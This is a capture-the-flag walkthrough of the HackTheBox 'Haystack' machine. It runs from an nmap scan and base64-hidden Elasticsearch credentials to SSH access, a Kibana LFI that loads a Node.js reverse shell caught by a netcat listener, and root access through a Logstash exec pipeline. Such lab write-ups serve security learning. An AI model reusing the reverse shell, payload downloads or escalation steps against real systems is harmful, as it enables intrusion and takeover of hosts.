HackTheBox: Haystack

The first step. As is almost always the case is to run an Nmap scan on the host to discover which services are running:

root@kali:~/Documents/haystack# nmap -A -oN scan
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-14 17:23 UTC
Nmap scan report for
Host is up (0.017s latency).
Not shown: 997 filtered ports
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 2a:8d:e2:92:8b:14:b6:3f:e4:2f:3a:47:43:23:8b:2b (RSA)
|   256 e7:5a:3a:97:8e:8e:72:87:69:a3:0d:d1:00:bc:1f:09 (ECDSA)
|_  256 01:d2:59:b2:66:0a:97:49:20:5f:1c:84:eb:81:ed:95 (ED25519)
80/tcp   open  http    nginx 1.12.2
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn't have a title (text/html).
9200/tcp open  http    nginx 1.12.2
| http-methods: 
|_  Potentially risky methods: DELETE
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn't have a title (application/json; charset=UTF-8).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2 - 4.9 (92%), Linux 3.10 - 4.11 (90%), Linux 3.18 (90%), Crestron XPanel control system (90%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 22/tcp)
1   16.13 ms
2   17.06 ms ip-10-10-10-115.eu-west-2.compute.internal (

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.78 seconds

From the output we can see that SSH is running on 22, and nginx webservers on 80 and 9200. when you browse to the page on port 80 you are greeted with a large image on a needle in a haystack. I downloaded this image and ran strings on the file.

root@kali:~/Downloads/haystack# strings needle.jpg

At the bottom of the strings output you can see a long string which appears to be encoded with base64.

root@kali:~/Downloads/haystack# echo 'bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==' | base64 -d
la aguja en el pajar es "clave"

I then decided to browse to port 9200 on It returned some JSON formatted data which indicates that it is hosting an elasticsearch database:

  "name" : "iQEYHgS",
  "cluster_name" : "elasticsearch",
  "cluster_uuid" : "pjrX7V_gSFmJY-DxP4tCQg",
  "version" : {
    "number" : "6.4.2",
    "build_flavor" : "default",
    "build_type" : "rpm",
    "build_hash" : "04711c2",
    "build_date" : "2018-09-26T13:34:09.098244Z",
    "build_snapshot" : false,
    "lucene_version" : "7.4.0",
    "minimum_wire_compatibility_version" : "5.6.0",
    "minimum_index_compatibility_version" : "5.0.0"
  "tagline" : "You Know, for Search"

I then browsed to to view the indices which are being used:


As you can see from the output, there are 3 indices. Kibana, Bank and quotes.

Now the next step I performed in quite a messy way. There is probably a much cleaner way of doing it. I knew from the decoded base 64 string from the image that the word of interest in ‘clave’. And so i browsed to each indices in turn and CTRL+F and searched the word clave. I have 2 results in the quotes index, both with additional base 64 strings:

{"quote":"Esta clave no se puede perder, la guardo aca: cGFzczogc3BhbmlzaC5pcy5rZXk="}
{"quote":"Tengo que guardar la clave para la maquina: dXNlcjogc2VjdXJpdHkg "}

I then decoded these strings using the same method as before.

root@kali:~/Downloads/haystack# echo 'cGFzczogc3BhbmlzaC5pcy5rZXk=' | base64 -d
pass: spanish.is.key
root@kali:~/Downloads/haystack# echo 'dXNlcjogc2VjdXJpdHkg' | base64 -d
user: security

So we now have some login credentials which allow you to access the machine via SSH. From the indices we can see that Kibana is very likely installed. Once logged in via SSH i checked out the kibana config file to see how it has been setup.

root@kali:~/Downloads/haystack# ssh security@
security@'s password: 
Last login: Tue Aug  6 15:52:37 2019 from
[security@haystack ~]$ cat /etc/kibana/kibana.yml 
# Kibana is served by a back end server. This setting specifies the port to use.
server.port: 5601

# Specifies the address to which the Kibana server will bind. IP addresses and host names are both valid values.
# The default is 'localhost', which usually means remote machines will not be able to connect.
# To allow connections from remote users, set this parameter to a non-loopback address.
server.host: ""

We can see that it is running on port 5601 but it is only bound to the localhost, and isn’t accessible remotely. After a bit of googling i found an LFI vulnerability in this version of Kibana that we can use to escalate privileges.

The first stage in executing the vulnerability is to upload a javascript shell that can be executed by kibana. i hosted the following javascript file on my kali machine via pythons SimpleHTTPServer. Of course making sure to change the IP address to match my openVPN IP.

    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(1337, "", function(){
    return /a/; // Prevents the Node.js application form crashing

I then downloaded the file to the haystack machine using curl.

[security@haystack ~]$ cd /tmp
[security@haystack tmp]$  curl --output jim.js

The next step is to start a netcat listener on the Kali machine which received the traffic generated by the reverse shell once it is run. This listener needs to run on port 1337 as stated in the JavaScript file.

root@kali:~/Downloads# nc -lvp 1337 
listening on [any] 2601 ...

I then send the GET request to kibana as described in the LFI vulnerability page on GitHub. I did this using curl. The request has to be from the localhost as kibana is only accessible locally.

[security@haystack tmp]$ curl -X GET ''

Then looking at the listener we can see that the connection has been made. Typing ls lists the currently directory successfully.

root@kali:~/Downloads# nc -lvp 1337
listening on [any] 2601 ... inverse host lookup failed: Unknown host
connect to [] from (UNKNOWN) [] 56236

I upgraded to a more user friendly bash shell using python. You can also see from the whoami that we are now accessing the machine as the kibana user:

python -c 'import pty; pty.spawn("/bin/bash")' 

bash-4.2$ whoami

We now need to find a process that can be abused in some way to allow privilege escalation to root. By running ps aux we can see all running processes. It is apparat from this that logstash is running as root.

[security@haystack ~]$ ps aux | grep logstash
root       6147 22.4  7.5 2658288 293184 ?      SNsl 16:18   0:33 /bin/java -Xms500m -Xmx500m -XX:+UseParNewGC -XX:+UseConcMarkSweepGC -XX:CMSInitiatingOccupancyFraction=75 -XX:+UseCMSInitiatingOccupancyOnly -Djava.awt.headless=true -Dfile.encoding=UTF-8 -Djruby.compile.invokedynamic=true -Djruby.jit.threshold=0 -XX:+HeapDumpOnOutOfMemoryError -Djava.security.egd=file:/dev/urandom -cp /usr/share/logstash/logstash-core/lib/jars/animal-sniffer-annotations-1.14.jar:/usr/share/logstash/logstash-core/lib/jars/commons-codec-1.11.jar:/usr/share/logstash/logstash-core/lib/jars/commons-compiler-3.0.8.jar:/usr/share/logstash/logstash-core/lib/jars/error_prone_annotations-2.0.18.jar:/usr/share/logstash/logstash-core/lib/jars/google-java-format-1.1.jar:/usr/share/logstash/logstash-core/lib/jars/gradle-license-report-0.7.1.jar:/usr/share/logstash/logstash-core/lib/jars/guava-22.0.jar:/usr/share/logstash/logstash-core/lib/jars/j2objc-annotations-1.1.jar:/usr/share/logstash/logstash-core/lib/jars/jackson-annotations-2.9.5.jar:/usr/share/logstash/logstash-core/lib/jars/jackson-core-2.9.5.jar:/usr/share/logstash/logstash-core/lib/jars/jackson-databind-2.9.5.jar:/usr/share/logstash/logstash-core/lib/jars/jackson-dataformat-cbor-2.9.5.jar:/usr/share/logstash/logstash-core/lib/jars/janino-3.0.8.jar:/usr/share/logstash/logstash-core/lib/jars/jruby-complete- org.logstash.Logstash --path.settings /etc/logstash

I took a look at the logstash configuration:

bash-4.2$ cd /etc/logstash/conf.d/
bash-4.2$ ls
filter.conf  input.conf  output.conf
bash-4.2$ cat output.conf
cat output.conf 
output {
  if [type] == "execute" {
    stdout { codec => json }
    exec {
      command => "%{comando} &"
bash-4.2$ cat input.conf 
cat input.conf 
input {
  file {
    path => "/opt/kibana/logstash_*"
    start_position => "beginning"
    sincedb_path => "/dev/null"
    stat_interval => "10 second"
    type => "execute"
    mode => "read"
bash-4.2$ cat filter.conf 
cat filter.conf 
filter {
  if [type] == "execute" {
    grok {
      match => { "message" => "Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}" }

You can see that logstash is configured with 3 files. Input, output and filter.

Input.conf shows that it gathers data from /opt/kibana/logstash_*.  This is checked every 10 seconds.

Filter.conf then shows that it is then filtered for messages matching the Ejecutar comando:

output.conf then shows that the command in the dynamic string comando is executed.

With this information we now know that we need to provided data in /opt/kibana/logstash_* which includes a command we want to run. This command will be executed by logstash, which in turn is running as root.

Logstash is very new to me. I wasn’t completely sure of the format that needed to be used in the logfile for a command to be captured by the filter an executed. Because of this i went for the spray a pray technique where i loaded the file with an assortment of possible formats which would be executed line by line until one works. The file can be seen here:

comando: cat /root/root.txt > /tmp/good
cat /root/root.txt > /tmp/good2
Ejecutar comando: cat /root/root.txt > /tmp/good3
GREEDYDATA:whoami > cat /root/root.txt > /tmp/good4
Ejecutar\s*comando\s*: cat /root/root.txt > /tmp/good5

I hosted this file on my Kali machine through python SimpleHTTPServer and downloaded it to the haystack machine into the /opt/kibana directory.

bash-4.2$ cd /opt/kibana/

curl --output logstash_i
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   180  100   180    0     0   2964      0 --:--:-- --:--:-- --:--:--  2950

I waited the 10 seconds as configured in the input.conf for the file to be processed. I then checked the /tmp directory to see if my file had been created.

bash-4.2$ ls /tmp

As you can see the good3 file has been outputted to /tmp. I did try recreating the logstash_j file with just the line which executed. But for some reason it didn’t work. Im still not 100% sure what the format should be. All i know is what i used worked, even though it is a bit messy. I then run cat on the file to view the flag and complete the machine.

bash-4.2$ cat /tmp/good

Leave a Reply

Your email address will not be published. Required fields are marked *